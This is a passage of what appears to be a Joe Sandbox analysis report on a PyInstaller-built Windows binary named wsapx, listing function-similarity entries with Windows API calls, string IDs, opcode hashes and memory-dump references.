                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                                • Opcode ID: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
                                                                                                                                                                                                                                                • Instruction ID: 2a7b28c8b8fe390e5f37d72770fe89c93e9a5191be55e77e847426bb886f5d33
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e3bf3a8b1345e2c0c0bdd6ff4e06add0bb9355989cc78c5a669156b3459c754
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D215E61A0C64243EB10AF56F49563AE7B1FFC5FB0F900235EAAD43AE4DE6CD4468B50
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                                                • Instruction ID: 96679687bb0f867858aec36cca566132b03a234d53476b55c5c9711b93eb1809
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C215721F0C28243FA697FA1765613DE1965FC4FB0F808634E93E86AD6DE2CB5438321
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                • Instruction ID: 0226122bda733956a6502481375fa0f909eb21a739ada15b9670158838be3f89
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC11D631718A4187E361AF12F884329A2A0FBD8FF4F800234D95E87794DF3CE9458B50
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B8592
                                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B85E9
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7C71B45E4,00000000,00007FF7C71B1985), ref: 00007FF7C71B9439
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B8678
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B86E4
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B86F5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF7C71B9216), ref: 00007FF7C71B870A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                                • Opcode ID: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
                                                                                                                                                                                                                                                • Instruction ID: 294a10dc7d3b9772d298fc8b9ea58a2a6babd96ee555ac5c571488e1705874c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2770b171440e78660be4c91fda42c27049aa369c6710ced6bdf6821ec2ad01d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 384191A2B1868243E730AF12B5406AAA394FBC8FE4F840135DE4D57B89DE3CD543C760
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: GetCurrentProcess.KERNEL32 ref: 00007FF7C71B8780
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: OpenProcessToken.ADVAPI32 ref: 00007FF7C71B8793
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: GetTokenInformation.ADVAPI32 ref: 00007FF7C71B87B8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: GetLastError.KERNEL32 ref: 00007FF7C71B87C2
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: GetTokenInformation.ADVAPI32 ref: 00007FF7C71B8802
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7C71B881E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71B8760: CloseHandle.KERNEL32 ref: 00007FF7C71B8836
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF7C71B3C55), ref: 00007FF7C71B916C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF7C71B3C55), ref: 00007FF7C71B9175
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                • Instruction ID: 7d25f7ac8a3c166c1bdede6ca0dbec049a34941688e647fd4765907fde19d170
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C218C61A0864287E610BF10F4552EAA261EFC8BA0FC44032EE4D43786DF3CD90687A0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB347
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB37D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3AA
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3BB
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3CC
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF7C71C4F81,?,?,?,?,00007FF7C71CA4FA,?,?,?,?,00007FF7C71C71FF), ref: 00007FF7C71CB3E7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                                                • Instruction ID: 84e7e0a9fadca4a6f36f01f422b65ca118ae486240f7ff63dd1cf62948d89dfb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54115C21B0C64283FA657FA1769513DE1865FC4FB0FD45734E82E86BD6DE2CA5438322
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C71B1B6A), ref: 00007FF7C71B295E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                • Instruction ID: 0e6d034a4e7fc8c4bebf70231812136ac6f2f6419f14b6921b6d034f5fc074f6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B31C462B1868153E720BF61B8416E6A694BFC8BF4F804132EE8D83759EF3CD54B8610
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                • Opcode ID: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
                                                                                                                                                                                                                                                • Instruction ID: fe9599cde958b9244c90cfe3cf0b1c5f1ac0c296915bac6f656c3aca88e967af
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd10c28d74256616f4f20b34f0e4914686707bcd8d030bd0fddff274f11205b5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F312F726196818AEB20EF61F8552F9A360FFC8BA4F844135EE4E47B59DF3CD1068710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7C71B918F,?,00007FF7C71B3C55), ref: 00007FF7C71B2BA0
                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF7C71B2C2A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                • Instruction ID: 817611a5d3294286b8bd5edb3c49afabb3c5bfebe8999a8e7b000bb8bffb938e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E921B172718B4183E721AF54F4847AAA3A4EB88BD4F804131EE8D53659DF3CD206C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7C71B1B99), ref: 00007FF7C71B2760
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                • Instruction ID: 64d08f87e1268a892e2fd38ffa748b565af9ca2ae3d8a0c340e32ee224ec91d1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF218372A19B8183E621EF51B4817E6A394FBC8BE4F800135EE8D43759DF3CD6468750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                • Instruction ID: 7d48d5ec2930485cf425f8dd2f30bdf2d43a517a67006d89db4082c16d051a11
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DF0AF21A08B0693EA20AF60B498B799320AFC9B71F840235CA6F461E4CF2CD246C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction ID: b99009e7075c00af2b9655543ceb189c9fd05b428b6562c3fe5f9e1b9021c045
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D811B672D0CA1343F6563914F6DA3759844EFF8B74E850634EA6E062D7CF2C69438960
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB41F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB43E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB466
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB477
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7C71CA613,?,?,00000000,00007FF7C71CA8AE,?,?,?,?,?,00007FF7C71CA83A), ref: 00007FF7C71CB488
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                • Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                                                • Instruction ID: b9b6ea16b84fcbe13025ca2c23c611670384b90b0d97639ecc483b1a946ed828
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE113D21B0D64243FA68BFA5755617DE18A5FC4FB0FC48334E93E8A6D6DE2CA5438221
                                                                                                                                                                                                                                                APIs
